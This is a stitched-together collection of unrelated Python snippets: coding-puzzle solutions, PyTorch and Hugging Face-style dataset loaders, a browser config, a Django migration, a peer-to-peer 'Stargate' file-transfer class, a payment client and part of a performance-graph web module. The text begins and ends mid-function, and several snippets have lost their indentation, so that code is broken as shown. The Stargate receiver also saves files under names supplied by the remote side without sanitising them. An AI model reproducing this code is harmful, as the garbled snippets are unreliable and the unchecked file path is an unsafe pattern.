# This variable will store result
num = roman_map[s[n - 1]]
# Loop for each character from right to left
for i in range(n - 2, -1, -1):
# Check if the character at right of current character is bigger or smaller
if roman_map[s[i]] >= roman_map[s[i + 1]]:
num += roman_map[s[i]]
else:
num -= roman_map[s[i]]
return num
if __name__ == '__main__':
print(romanToInt('III'))
print(romanToInt('IV'))
print(romanToInt('IX'))
print(romanToInt('LVIII'))
print(romanToInt('MCMXCIV'))
|
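# Hedged scaffolding (not part of the original snippet): LeetCode normally
# supplies ListNode and the driver code; a minimal definition plus small
# helpers are sketched here so the Solution class below is self-contained.
class ListNode:
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next
def _build(values):
    dummy = ListNode()
    cur = dummy
    for v in values:
        cur.next = ListNode(v)
        cur = cur.next
    return dummy.next
def _to_list(head):
    out = []
    while head is not None:
        out.append(head.val)
        head = head.next
    return out
# Example: _to_list(Solution().XXX(_build([1, 1, 2, 3, 3]))) -> [1, 2, 3]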
class Solution:
    def XXX(self, head: ListNode) -> ListNode:
        if head is None or head.next is None:  # handle an empty or single-node list
            return head
        p = head  # pointer that walks the list from the head node
        while True:
            if p.val == p.next.val:  # duplicate value found
                p.next = p.next.next  # unlink the duplicate node
            else:
                p = p.next  # otherwise advance to the next node
            if p.next is None:  # stop once the tail is reached
                break
        return head  # return the head of the deduplicated list
|
from PIL import Image
import pickle
from torch.utils.data import Dataset, DataLoader
import torch
from torchvision import transforms
import os
class shirtDataset_train(Dataset):
def __init__(self, path, transform=None):
        # read the pickled dataset
self.full_data = None
with open(path, 'rb') as f:
self.full_data = pickle.load(f)
self.numpair = len(self.full_data)
        self.numpair = 1000  # cap the training split to the first 1000 pairs (the rest feeds shirtDataset_test)
# imagedata
self.full_imagedata = []
for i in range(self.numpair):
self.full_imagedata.append(Image.fromarray(self.full_data[i][0]))
# self.full_imagedata.append(Image.fromarray(self.full_data[i][1]))
self.transform = transform
def __len__(self):
# the length of valid frames
return self.numpair
def __getitem__(self, idx):
output = self.full_imagedata[idx]
if self.transform:
output = self.transform(output)
return output
class shirtDataset_test(Dataset):
def __init__(self, path, transform=None):
        # read the pickled dataset
self.full_data = None
with open(path, 'rb') as f:
self.full_data = pickle.load(f)
self.numpair = len(self.full_data) - 1000
# imagedata
self.full_imagedata = []
for i in range(self.numpair):
self.full_imagedata.append(Image.fromarray(self.full_data[i+1000][0]))
# self.full_imagedata.append(Image.fromarray(self.full_data[i+1000][1]))
self.transform = transform
def __len__(self):
# the length of valid frames
return self.numpair
def __getitem__(self, idx):
output = self.full_imagedata[idx]
if self.transform:
output = self.transform(output)
return output
if __name__ == '__main__':
path = 'data/shirt_dataset_20191217_20200109_no_unf.pkl'
image_size = 64
batchsize = 32
transform = transforms.Compose(
[
transforms.Resize(image_size),
transforms.CenterCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (1, 1, 1)),
]
)
dataset = shirtDataset_train(path, transform=transform)
loader = DataLoader(dataset, shuffle=True, batch_size=batchsize, num_workers=4)
loader = iter(loader)
data = next(loader)
print(data.shape)
|
config.load_autoconfig(False)
config.source("gruvbox.py")
c.content.default_encoding = "utf-8"
c.colors.webpage.prefers_color_scheme_dark = True
c.content.images = False
c.content.javascript.enabled = False
c.content.cookies.accept = "never"
c.content.webrtc_ip_handling_policy = "disable-non-proxied-udp"
c.tabs.last_close = "close"
c.tabs.show = "never"
config.bind("q", "quit")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: Ampel-core/ampel/template/ChannelWithProcsTemplate.py
# License: BSD-3-Clause
# Author: valery brinnel <firstname.lastname@gmail.com>
# Date: 16.10.2019
# Last Modified Date: 05.01.2022
# Last Modified By: valery brinnel <firstname.lastname@gmail.com>
from ampel.log.AmpelLogger import AmpelLogger
from typing import Any
from ampel.config.builder.FirstPassConfig import FirstPassConfig
from ampel.abstract.AbsChannelTemplate import AbsChannelTemplate
from ampel.model.ChannelModel import ChannelModel
class ChannelWithProcsTemplate(AbsChannelTemplate):
""" Convenience class allowing channel definitions to include processes. """
# Note: not using list[ProcessModel] on purpose since embedded processes
# might need template processing as well
process: list[dict[str, Any]]
def get_channel(self, logger: AmpelLogger) -> dict[str, Any]:
return self.dict(include=ChannelModel.get_model_keys())
def get_processes(self, logger: AmpelLogger, first_pass_config: FirstPassConfig) -> list[dict[str, Any]]:
# Note: not enforcing channel selection for t3 processes
# as these could require template processing first
return [
self.transfer_channel_parameters(p)
for p in self.process
]
|
# Longest Increasing Subsequence
class Solution(object):
def lengthOfLIS(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# tails[i] = the smallest tail of all increasing subseq with length i+1
# for example given [4, 5, 6, 3],
        # tails[1] = 5 (from the increasing subsequence [4, 5])
tails = [0] * len(nums)
size = 0
for num in nums:
i, j = 0, size
# find the smallest tail for tails[i]
while i < j:
                m = (i + j) // 2  # integer midpoint (floor division keeps this valid on Python 3)
if tails[m] < num:
i = m + 1
else:
j = m
tails[i] = num
size = max(size, i + 1)
return size
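# Worked example (added for illustration): for nums = [2, 1, 5, 3, 6, 4, 8, 9, 7]
# tails evolves as [2] -> [1] -> [1, 5] -> [1, 3] -> [1, 3, 6] -> [1, 3, 4]
# -> [1, 3, 4, 8] -> [1, 3, 4, 8, 9] -> [1, 3, 4, 7, 9], so the answer is 5
# (e.g. the increasing subsequence 1, 3, 4, 8, 9).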
if __name__ == '__main__':
seq = [2, 1, 5, 3, 6, 4, 8, 9, 7]
    print(Solution().lengthOfLIS(seq))
|
"""
Tests for application package.
"""
|
from .generator_discriminator_v1 import (StyleGAN1Discriminator,
StyleGANv1Generator)
from .generator_discriminator_v2 import (StyleGAN2Discriminator,
StyleGANv2Generator)
from .mspie import MSStyleGAN2Discriminator, MSStyleGANv2Generator
__all__ = [
'StyleGAN2Discriminator', 'StyleGANv2Generator', 'StyleGANv1Generator',
'StyleGAN1Discriminator', 'MSStyleGAN2Discriminator',
'MSStyleGANv2Generator'
]
|
'''
Store the references to the dependent data information for a given dataProxy
'''
class DataHistory(object):
def __init__(self, proxy):
self.proxy = proxy
self.history = dict()
self.updateDataRef()
def updateDataRef(self):
self.history[self.proxy.type] = self.proxy.getData()
def updateHistory(self, historyObj):
for key in historyObj.history:
self.history[key] = historyObj.history[key]
@staticmethod
def checkHistory(*args):
'''
        check that all data proxies in the arg list have consistent (non-conflicting) histories
'''
historySummary = dict()
# print "Existing keys for data history: ", historySummary.keys()
# print " History Summary = ", historySummary.keys()
for proxy in args:
# print " Proxy = ", proxy.getData()
if not proxy.valid():
print ("DataHistory: checkHistory proxy is invalid")
return False
# print "proxy keys = ", proxy.history.history.keys()
for key in proxy.history.history:
if key in historySummary:
# print "k1: ", key
# print "k2: ", historySummary.keys()
# print key, proxy.history.history[key]
if proxy.history.history[key] is not historySummary[key]:
print ("DataHistory:checkHistory history disagree")
return False
else:
historySummary[key] = proxy.history.history[key]
# print "historySummary:", historySummary
return True
|
# Generated by Django 3.2 on 2021-05-10 19:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('network', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='account',
name='account_type',
field=models.CharField(default='None', max_length=40),
preserve_default=False,
),
migrations.AddIndex(
model_name='account',
index=models.Index(fields=['username', 'account_type'], name='network_acc_usernam_1b4fde_idx'),
),
]
|
from typing import List, NoReturn
from _thread import start_new_thread
import time
import tempfile
import os
import base64
from .stargate_listen_loop import StargateListenLoop
from .stargate_send_loop import StargateSendLoop
from .helpers import *
from .event_hook import EventHook
class StargateNetwork():
"""Class for representing a stargate on internet
Must be powered on before sending of receiving call
This expose those events :
- self.onDialingConnection = Start connecting to a stargate
- self.onDialingConnected = If connection is ok
- self.onDialingDisconnection = If connection is ko
- self.onIncomingConnection = Start receiving from a stargate
- self.onIncomingConnected = Connected from a stargate
- self.onIncomingDisconnection = Disconnected from a stargate
- self.onIncomingDataText = Text received from a stargate
- self.onIncomingDataFile = File received from a stargate
"""
def __init__(self, host: str = '', port: int = 24801) -> NoReturn:
self.host = host
self.port = port
self.__listenloop = None
self.__sendLoop = None
self.__TimerLoop = None
self.powered = False
self.connected = False
self.ipConnectedTo = None
self.disablelisten = False
self.disablesend = False
self.reservedSequences = {
"38.38.38.38.38.38.38": "127.0.0.1"
}
self.onDialingConnection = EventHook()
self.onDialingConnected = EventHook()
self.onDialingDisconnection = EventHook()
self.onIncomingConnection = EventHook()
self.onIncomingConnected = EventHook()
self.onIncomingDisconnection = EventHook()
self.onIncomingDataText = EventHook()
self.onIncomingDataFile = EventHook()
self.otherSequence = None
self.dialFinish = False
def __str__(self) -> str:
return f"Stargate { self.getAddressOnNetwork() if self.powered and not self.disablelisten else None} \r\n\t Power state : {self.powered}\r\n\t Connection status : {self.connected} to {self.ipConnectedTo} \r\n\t Can Call : {not self.disablesend}\r\n\t Can Receve : {not self.disablelisten}"
def powerOn(self) -> NoReturn:
"""Power On the stargate
Instantiate ListenLoop Thread and configure the events
"""
if(self.powered):
return
self.powered = True
if not self.disablelisten:
self.__listenloop = StargateListenLoop(self)
self.__listenloop.onIncomingConnection += self.incomingConnection
self.__listenloop.onIncomingConnected += self.incomingConnected
self.__listenloop.onIncomingDisconnected += self.incomingDisconnected
self.__listenloop.configureConnection()
self.__listenloop.start()
def powerOff(self) -> NoReturn:
"""Power Off the stargate
Close and delete Listen and Send threads
"""
if not self.powered:
return
if not self.disablelisten and self.__listenloop is not None:
self.__listenloop.stop()
self.__listenloop = None
if not self.disablesend and self.__sendLoop is not None:
self.__sendLoop.stop()
self.__sendLoop = None
self.powered = False
    def getAddressOnNetwork(self) -> dict:
        """Return the stargate code sequences for this gate over the network
        Returns:
            dict: the LAN and WAN stargate code sequences
        """
d = dict()
IpLan = self.__listenloop.getLocalAddress()
d["LAN"] = IpToStargateCode(SequenceToListInt(IpLan))
IpWan = self.__listenloop.getExternalAdress()
d["WAN"]= IpToStargateCode(SequenceToListInt(IpWan))
return d
def dial(self, sequence: str) -> NoReturn:
"""Dial sequence.
If ok -> connect to another stargate
Args:
sequence (str): the stargate sequence to dial
"""
if not self.powered or self.connected or self.__sendLoop is not None:
return
        # search it in the reserved sequences
self.otherSequence = sequence
print(sequence)
if(sequence in self.reservedSequences):
ip = self.reservedSequences[sequence]
else:
sequence = SequenceToListInt(sequence)
ip = StargateCodeToIp(sequence)
ip = ListIntToSequence(ip)
# creating the connection
self.__sendLoop = StargateSendLoop(self)
self.__sendLoop.onOutConnectionStart += self.dialingStart
self.__sendLoop.onOutConnected += self.outConnected
self.__sendLoop.onOutConnectionError += self.outConnectionError
self.__sendLoop.onOutDisconnected += self.outDisconnected
self.__sendLoop.dial(ip, self.port)
def disconnect(self) -> NoReturn:
"""Disconnect from another stargate
"""
if not self.powered or not self.connected or self.__sendLoop is None:
return
self.__sendLoop.stop()
self.__sendLoop = None
self.connected = False
def __resetConnectionInfo(self) -> NoReturn:
"""Reset connection infos
"""
self.ipConnectedTo = None
self.connected = False
def dialingStart(self, sequence: str) -> NoReturn:
"""When dialing start
Args:
sequence (str): sequence to dial
"""
self.dialFinish = False
self.onDialingConnection.fire(
self.otherSequence, self.dialSequenceFinish)
def dialSequenceFinish(self) -> NoReturn:
"""Callback for when the dial sequence is finish
"""
self.dialFinish = True
def outConnected(self, sequence: str) -> NoReturn:
"""When out connected
Args:
sequence (str): sequence to dial
"""
self.ipConnectedTo = sequence
self.connected = True
self.onDialingConnected.fire()
start_new_thread(self.__timerClose, ())
def outConnectionError(self) -> NoReturn:
"""When out fail to connect
"""
print("out connection error")
self.__resetConnectionInfo()
def outDisconnected(self) -> NoReturn:
"""When out disconnect
"""
self.__resetConnectionInfo()
self.onDialingDisconnection.fire()
def incomingConnection(self, sequence) -> NoReturn:
"""When in connect
Args:
sequence (str): sequence from dial
"""
if(sequence in self.reservedSequences.values()):
sequence = list(self.reservedSequences.keys())[list(
self.reservedSequences.values()).index(sequence)]
else:
sequence = SequenceToListInt(sequence)
sequence = IpToStargateCode(sequence)
sequence = ListIntToSequence(sequence)
self.dialFinish = False
self.onIncomingConnection.fire(sequence, self.dialSequenceFinish)
def incomingConnected(self, sequence) -> NoReturn:
""""When in connected
Args:
sequence (str): sequence from dial
"""
self.connected = True
self.ipConnectedTo = sequence
self.onIncomingConnected.fire()
def incomingDisconnected(self) -> NoReturn:
"""When out disconnect
"""
self.__resetConnectionInfo()
self.onIncomingDisconnection.fire()
def sendDataText(self, msg: str) -> NoReturn:
"""Send text
Args:
msg (str): text to send
"""
if not self.powered or not self.connected or self.__sendLoop is None:
return
self.__sendLoop.sendTroughGate("text.tp", msg)
def sendDataFile(self, fileName: str) -> NoReturn:
"""Send file in base64 encoding
Args:
fileName (str): file name in absolute path
"""
if not self.powered or not self.connected or self.__sendLoop is None:
return
try:
file = open(fileName, "rb")
datas = file.read()
file.close()
datas = (base64.b64encode(datas)).decode('ascii')
fileName = os.path.basename(fileName)
self.__sendLoop.sendTroughGate(fileName, datas)
except Exception as e:
print(e)
pass
def receiveDataText(self, msg: str) -> NoReturn:
"""Receive text
Args:
msg (str): the text received
"""
self.onIncomingDataText.fire(msg)
def receiveDataFile(self, fileName: str, payload: str) -> NoReturn:
"""Receive file
Args:
fileName (str): name of the file
            payload (str): content in base64 encoding
"""
path = os.path.join(os.getcwd(), "Gate Room")
if not os.path.exists(path):
os.makedirs(path)
try:
file = open(os.path.join(path, fileName), "wb")
datas = base64.b64decode(payload.encode('ascii'))
file.write(datas)
file.close()
self.onIncomingDataFile.fire(fileName)
except:
pass
def __timerClose(self) -> NoReturn:
"""Timer for 38 minuts disconnection
"""
delay = 2280 # (38*60 seconds)
startTime = time.time()
while startTime + delay > time.time() and self.connected:
time.sleep(1)
if(self.connected):
self.disconnect()
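# Hedged usage sketch (illustrative only, not part of the original module):
# wires a gate's events to simple print handlers and dials the reserved
# loopback sequence declared in `reservedSequences`. Actually completing the
# call still depends on the listen loop accepting the connection.
def _example_loopback_dial():
    gate = StargateNetwork()
    gate.onIncomingDataText += lambda msg: print("received:", msg)
    gate.onDialingConnected += lambda: print("outgoing wormhole established")
    gate.powerOn()
    gate.dial("38.38.38.38.38.38.38")  # reserved sequence mapped to 127.0.0.1 above
    gate.sendDataText("Hello through the gate")
    gate.disconnect()
    gate.powerOff()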
|
# -*- coding: utf-8 -*-
"""
@author: mwahdan
"""
from dialognlu import BertNLU
from dialognlu.readers.goo_format_reader import Reader
train_path = "../data/snips/train"
val_path = "../data/snips/valid"
train_dataset = Reader.read(train_path)
val_dataset = Reader.read(val_path)
save_path = "../saved_models/joint_bert_model"
epochs = 1 #3
batch_size = 64
config = {
"model_type": "bert"
}
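# BertNLU trains a joint intent-classification / slot-filling model; "model_type" presumably
# selects the encoder variant (see the dialognlu documentation for the supported values)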
nlu = BertNLU.from_config(config)
nlu.train(train_dataset, val_dataset, epochs, batch_size)
print("Saving ...")
nlu.save(save_path)
print("Done")
|
class Capture(object):
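    """Thin wrapper around the payment captures endpoints: create a capture,
    list all captures of a payment, or retrieve a single capture."""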
def __init__(self, client):
self.client = client
def create_capture(self, payment_id, **kwargs):
headers = self.client._get_private_headers()
payload = dict()
payload.update(kwargs)
endpoint = '/payments/{}/captures'.format(payment_id)
return self.client._post(self.client.URL_BASE + endpoint, json=payload, headers=headers)
def retrieve_all_captures(self, payment_id):
headers = self.client._get_private_headers()
endpoint = '/payments/{}/captures'.format(payment_id)
return self.client._get(self.client.URL_BASE + endpoint, headers=headers)
def retrieve_capture(self, *, payment_id, capture_id):
headers = self.client._get_private_headers()
endpoint = '/payments/{}/captures/{}'.format(payment_id, capture_id)
return self.client._get(self.client.URL_BASE + endpoint, headers=headers)
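
# Minimal usage sketch (assumes a configured API client exposing URL_BASE, _get_private_headers(),
# _get() and _post() as used above; the payment/capture ids below are hypothetical):
#
#   captures = Capture(client)
#   captures.create_capture("pay_123", amount=1000)
#   captures.retrieve_all_captures("pay_123")
#   captures.retrieve_capture(payment_id="pay_123", capture_id="cap_456")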
|
number1 = 10
number2 = 20
number3 = 30
number4 = 40
number = 50
number = 505050505050
for i in range(5):
    print(i)
# gaoshenghedahaoren  (pinyin, roughly: "Gaoshenghe is a really good person")
# w s ni d laoban  (pinyin shorthand for "wo shi ni de laoban" -- "I am your boss")
|
#############################################################################
#
# VFRAME Synthetic Data Generator
# MIT License
# Copyright (c) 2019 Adam Harvey and VFRAME
# https://vframe.io
#
#############################################################################
import click
from vframe.settings import app_cfg
@click.command()
@click.option('-i', '--input', 'opt_input', required=True,
help='Path to input directory of images')
@click.option('-o', '--output', 'opt_output', required=True,
help='Path to output directory to save degraded images')
@click.option('--slice', 'opt_slice', type=(int, int), default=(None, None),
help='Slice list of files')
@click.option('-t', '--threads', 'opt_threads', type=int,
  help='Number of threads')
@click.option('-e', '--ext', 'opt_exts', default=['jpg', 'png'],
multiple=True,
help='Glob extension')
@click.pass_context
def cli(ctx, opt_input, opt_output, opt_slice, opt_threads, opt_exts):
"""Degrades images, save to another directory"""
from os.path import join
import random
from PIL import Image
import pandas as pd
from glob import glob
from pathlib import Path
import cv2 as cv
import numpy as np
from tqdm import tqdm
from pathos.multiprocessing import ProcessingPool as Pool
from pathos.multiprocessing import cpu_count
from vframe.utils import log_utils, file_utils, im_utils
from vframe.utils.degrade_utils import quality, zoom_shift, scale
from vframe.utils.degrade_utils import motion_blur_v, motion_blur_h
from vframe.utils.degrade_utils import enhance, auto_adjust
from vframe.utils.degrade_utils import chromatic_aberration
log = app_cfg.LOG
log.info('Degrade data to match target domain')
if opt_input == opt_output:
log.error('Input can not equal output directory. Change input or output.')
return
opt_threads = opt_threads if opt_threads else cpu_count()
file_utils.ensure_dir(opt_output)
# glob images
fps_ims = file_utils.glob_multi(opt_input, exts=opt_exts, sort=True)
if any(opt_slice):
fps_ims = fps_ims[opt_slice[0]:opt_slice[1]]
log.info(f'found {len(fps_ims)} images in {opt_input}')
# multiproc pool
def pool_worker(fp_im):
im = cv.imread(fp_im)
try:
w, h = im.shape[:2][::-1]
except Exception as e:
log.error(f'Could not process: {fp_im}. {e}')
return
# randomly degrade image
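    # assumption: each degrade_utils call below applies its transform with probability `rate`,
    # sampling a strength from `value_range` and a blend factor from `alpha_range`
    # (see vframe.utils.degrade_utils for the exact semantics)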
im = quality(im, value_range=(30, 90), alpha_range=(0.5, 1.0), rate=1.0)
# im = motion_blur_v(im, value_range=(0.01, 0.1), alpha_range=(0.25, 0.75), rate=0.15)
# im = motion_blur_h(im, value_range=(0.01, 0.1), alpha_range=(0.25, 0.75), rate=0.15)
# im = scale(im, value_range=(0.05, 0.1), rate=0.15)
im = zoom_shift(im, value_range=(1, 6), alpha_range=(0.1, 0.6), rate=0.1)
im = enhance(im, 'sharpness', value_range=(0.5, 6.0), rate=0.15)
im = enhance(im, 'brightness', value_range=(0.75, 1.25), rate=0.15)
im = enhance(im, 'contrast', value_range=(0.75, 1.25), rate=0.15)
im = enhance(im, 'color', value_range=(0.75,1.25), rate=0.15)
im = auto_adjust(im, 'equalize', alpha_range=(0.05, 0.1), rate=0.15) # caution
im = auto_adjust(im, 'autocontrast', alpha_range=(0.1, 0.5), rate=0.15)
im = chromatic_aberration(im, 0, value_range=(1, 1), rate=0.1)
im_pil = im_utils.np2pil(im)
fp_out = join(opt_output, Path(fp_im).name)
cv.imwrite(fp_out, im)
# fill pool
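  # p.imap is lazy; wrapping it in list() drives the workers while tqdm reports progress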
with Pool(opt_threads) as p:
d = f'Degrading x{opt_threads}'
pool_results = list(tqdm(p.imap(pool_worker, fps_ims), total=len(fps_ims), desc=d))
|
#!/bin/python3
# Complete the separateNumbers function below.
def separateNumbers(s):
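    # Try every candidate first number s[:i] (at most half the string); from it, greedily check
    # that the rest of s is the concatenation of the successive integers a+1, a+2, ...
    # Print "YES <first number>" for the first split that works, otherwise "NO".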
n = len(s)
i = 1
while i <= n // 2:
j = i
a = int(s[:i])
flag = 1
while j < n:
b = str(a + 1)
if s[j:j + len(b)] != b:
flag = 0
break
j += len(b)
a = int(b)
if flag:
print('YES ' + s[:i])
return
i += 1
print('NO')
return
if __name__ == '__main__':
q = int(input())
for q_itr in range(q):
s = input()
separateNumbers(s)
|
# coding=utf-8
# Copyright 2022 The HuggingFace Datasets Authors and DataLab Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import datalabs
from datalabs.tasks import QuestionAnsweringMultipleChoicesWithoutContext
# TODO(ai2_arc): BibTeX citation
_CITATION = """\
@article{allenai:arc,
author = {Peter Clark and Isaac Cowhey and Oren Etzioni and Tushar Khot and
Ashish Sabharwal and Carissa Schoenick and Oyvind Tafjord},
title = {Think you have Solved Question Answering? Try ARC, the AI2 Reasoning Challenge},
journal = {arXiv:1803.05457v1},
year = {2018},
}
"""
# TODO(ai2_arc):
_DESCRIPTION = """\
A new dataset of 7,787 genuine grade-school level, multiple-choice science questions, assembled to encourage research in
advanced question-answering. The dataset is partitioned into a Challenge Set and an Easy Set, where the former contains
only questions answered incorrectly by both a retrieval-based algorithm and a word co-occurrence algorithm. We are also
including a corpus of over 14 million science sentences relevant to the task, and an implementation of three neural baseline models for this dataset. We pose ARC as a challenge to the community.
"""
_URL = "https://s3-us-west-2.amazonaws.com/ai2-website/data/ARC-V1-Feb2018.zip"
class Ai2ArcConfig(datalabs.BuilderConfig):
"""BuilderConfig for Ai2ARC."""
def __init__(self, **kwargs):
"""BuilderConfig for Ai2Arc.
Args:
**kwargs: keyword arguments forwarded to super.
"""
super(Ai2ArcConfig, self).__init__(version=datalabs.Version("1.0.0", ""), **kwargs)
class Ai2Arc(datalabs.GeneratorBasedBuilder):
"""TODO(arc): Short description of my dataset."""
# TODO(arc): Set up version.
VERSION = datalabs.Version("1.0.0")
BUILDER_CONFIGS = [
Ai2ArcConfig(
name="ARC-Challenge",
description="""\
Challenge Set of 2590 “hard” questions (those that both a retrieval and a co-occurrence method fail to answer correctly)
""",
),
Ai2ArcConfig(
name="ARC-Easy",
description="""\
Easy Set of 5197 questions
""",
),
]
def _info(self):
# TODO(ai2_arc): Specifies the datasets.DatasetInfo object
return datalabs.DatasetInfo(
# This is the description that will appear on the datasets page.
description=_DESCRIPTION,
# datasets.features.FeatureConnectors
features=datalabs.Features(
{
"id": datalabs.Value("string"),
"question": datalabs.Value("string"),
"options": datalabs.features.Sequence(datalabs.Value("string")),
"answers": # answers -> answerKey
{
"text": datalabs.Value("string"),
"option_index": datalabs.Value("int32"),
},
# These are the features of your dataset like images, labels ...
}
),
# If there's a common (input, target) tuple from the features,
# specify them here. They'll be used if as_supervised=True in
# builder.as_dataset.
supervised_keys=None,
# Homepage of the dataset for documentation
homepage="https://allenai.org/data/arc",
citation=_CITATION,
task_templates=[
QuestionAnsweringMultipleChoicesWithoutContext(
question_column="question", answers_column="answers",
options_column="options",
task="question-answering-multiple-choices-without-context",
)
],
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
# TODO(ai2_arc): Downloads the data and defines the splits
# dl_manager is a datasets.download.DownloadManager that can be used to
# download and extract URLs
dl_dir = dl_manager.download_and_extract(_URL)
data_dir = os.path.join(dl_dir, "ARC-V1-Feb2018-2")
return [
datalabs.SplitGenerator(
name=datalabs.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={"filepath": os.path.join(data_dir, self.config.name, self.config.name + "-Train.jsonl")},
),
datalabs.SplitGenerator(
name=datalabs.Split.TEST,
# These kwargs will be passed to _generate_examples
gen_kwargs={"filepath": os.path.join(data_dir, self.config.name, self.config.name + "-Test.jsonl")},
),
datalabs.SplitGenerator(
name=datalabs.Split.VALIDATION,
# These kwargs will be passed to _generate_examples
gen_kwargs={"filepath": os.path.join(data_dir, self.config.name, self.config.name + "-Dev.jsonl")},
),
]
def _generate_examples(self, filepath):
"""Yields examples."""
# TODO(ai2_arc): Yields (key, example) tuples from the dataset
dict_map = {"A": 0, "B": 1, "C": 2, "D": 3, "E": 4, "F": 5, "G": 6, "H": 7, "I": 8, "J": 9, "K": 10}
id_sample = 0
with open(filepath, encoding="utf-8") as f:
for row in f:
id_sample+=1
data = json.loads(row)
answerkey = data["answerKey"]
id_ = data["id"]
question = data["question"]["stem"]
choices = data["question"]["choices"]
text_choices = [choice["text"] for choice in choices]
label_choices = [choice["label"] for choice in choices]
option_index = dict_map[answerkey]
yield id_, {
"id": str(id_sample - 1),
"question": question,
"options": text_choices,
"answers": # answers -> answerKey
{
"text": text_choices[option_index],
"option_index": option_index,
},
# "answerKey": answerkey,
# "choices": {"text": text_choices, "label": label_choices},
}
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
###############################################################################
#
# This module implements the performance graph displaying HTTP interface.
# If the "performance" interface has been started in config_interfaces.py,
# this module is called to process HTTP request incoming through it.
# Each request is answered with an interactive, clickable, text-only
# HTML page containing performance diagrams.
#
# The working of this module is intimately tied with the internals of
# performance.py, for example it is presumed that there are exactly two
# kinds of performance readings - rates and times, and they have particular
# names, such as resource.foo.transaction_rate. The ranges (last hour plus
# one last minute) and scaling (0-39) of the collected data are also fixed
# to match that of the performance.py's (see extract() method).
#
# Pythomnic3k project
# (c) 2005-2014, Dmitry Dvoinikov <dmitry@targeted.org>
# Distributed under BSD license
#
################################################################################
__all__ = [ "process_request" ]
################################################################################
import io; from io import StringIO
import datetime; from datetime import datetime, timedelta
import urllib.parse; from urllib.parse import urlparse
if __name__ == "__main__": # add pythomnic/lib to sys.path
import os; import sys
main_module_dir = os.path.dirname(sys.modules["__main__"].__file__) or os.getcwd()
sys.path.insert(0, os.path.normpath(os.path.join(main_module_dir, "..", "..", "lib")))
import typecheck; from typecheck import typecheck, optional, by_regex, with_attr, \
dict_of, nothing
###############################################################################
# unicode box characters
b1 = "▁"; b2 = "▂"; b3 = "▃"; b4 = "▄"
b5 = "▅"; b6 = "▆"; b7 = "▇"; b8 = full_block = "█"
box_chars = (b1, b2, b3, b4, b5, b6, b7, b8)
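# a reading in the 0-39 range maps to one of 8 block heights when collapsed (high // 5)
# and to a 5-row column of eighth-blocks when expanded (divmod by 8), see the helpers below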
###############################################################################
# this method takes a low-high value in the range 0-39 and returns a single
# bar character representing it
@typecheck
def _collapsed_bar(s: optional((int, int))) -> str:
if s is None:
return " "
low, high = s; assert 0 <= low <= high <= 39
return box_chars[high // 5]
###############################################################################
# this method takes a low-high value in the range 0-39 and returns a column of 5
# characters representing it; the ones prefixed with ~ should appear in inverse (negative) video
@typecheck
def _expanded_bar(s: optional((int, int))) -> [str, str, str, str, str]:
if s is None:
return [" "] * 5
low, high = s; assert 0 <= low <= high <= 39
low_idx, low_level = divmod(low, 8)
high_idx, high_level = divmod(high, 8)
result = [" "] * low_idx
if low_idx < high_idx:
result.append(low_level > 0 and ("~" + box_chars[low_level - 1]) or full_block)
result.extend([full_block] * (high_idx - low_idx - 1))
result.append(box_chars[high_level])
result.extend([" "] * (4 - high_idx))
return result
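# e.g. _expanded_bar((9, 30)) == [" ", "~" + b1, b8, b7, " "]: empty bottom row, an inverse
# one-eighth notch, a full block, a seven-eighths block, empty top row (cf. self_test below)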
###############################################################################
# this method replaces certain formatting characters with fancy box-drawing ones
def _decorate(line: str) -> str:
result = ""
pc = None
for c in line:
if c == " ":
if pc != " ": result += "<span class=\"bk\">"
result += full_block
else:
if pc == " ": result += "</span>"
if c == "-": result += "—"
elif c == "+": result += "·"
elif c == "_": result += " "
elif c == "~": result += "―"
elif c == "*": result += "+"
else: result += c
pc = c
if pc == " ": result += "</span>"
return result
###############################################################################
def _quote(s):
return s.replace("&", "&").replace("<", "<").replace(">", ">").\
replace("\"", """).replace("'", "'")
###############################################################################
_hrule = "---------+---------+---------+---------+---------+---------+---------+"
_ref_times = list(map(_decorate, ["10.0~", " 3.0~", " 1.0~", " 0.3~", " 0.1~"]))
_ref_rates = list(map(_decorate, [" 100~", " 30~", " 10~", " 3~", " 1~"]))
legends = { "request_rate": "request rate",
"response_rate": "response rate",
"response_rate.success": "successful response rate",
"response_rate.failure": "failed responses rate",
"transaction_rate": "transaction rate",
"transaction_rate.success": "successful transaction rate",
"transaction_rate.failure": "failed transaction rate",
"pending_time": "pending time",
"processing_time": "processing time",
"processing_time.success": "successful processing time",
"processing_time.failure": "failed processing time",
"response_time": "response time",
"response_time.success": "successful response time",
"response_time.failure": "failed response time" }
default_reading_modes = { "interface": ("response_time", "collapsed"),
"resource": ("processing_time" , "collapsed") }
optional_readings = { "interface": ("request_rate", "pending_time", "processing_time", "response_time"),
"resource": ("transaction_rate", "pending_time", "processing_time") }
css_style = """\
<style type=\"text/css\"><!--
.default {{ color: black; background-color: white; vertical-align: bottom; font-family: {css_font_family:s}; }}
.bk {{ color: white }}
.c4 {{ color: green }}
.c4i {{ color: white; background-color: green }}
.c3 {{ color: forestgreen }}
.c3i {{ color: white; background-color: forestgreen }}
.c2 {{ color: yellowgreen }}
.c2i {{ color: white; background-color: yellowgreen }}
.c1 {{ color: goldenrod }}
.c1i {{ color: white; background-color: goldenrod }}
.c0 {{ color: orangered }}
.c0i {{ color: white; background-color: orangered }}
a {{ color: darkblue; text-decoration: none }}
//--></style>"""
###############################################################################
# this method takes a dict containing the parsed URL query and one of the optional
# mangling arguments, then assembles and returns a string with the modified URL query
def _format_modified_query(query: dict, *, expand = None, collapse = None, replace = None):
d = query.copy()
if expand:
d[expand] = "expanded"
if collapse:
d[collapse] = "collapsed"
if replace:
k, reading = replace
del d[k]
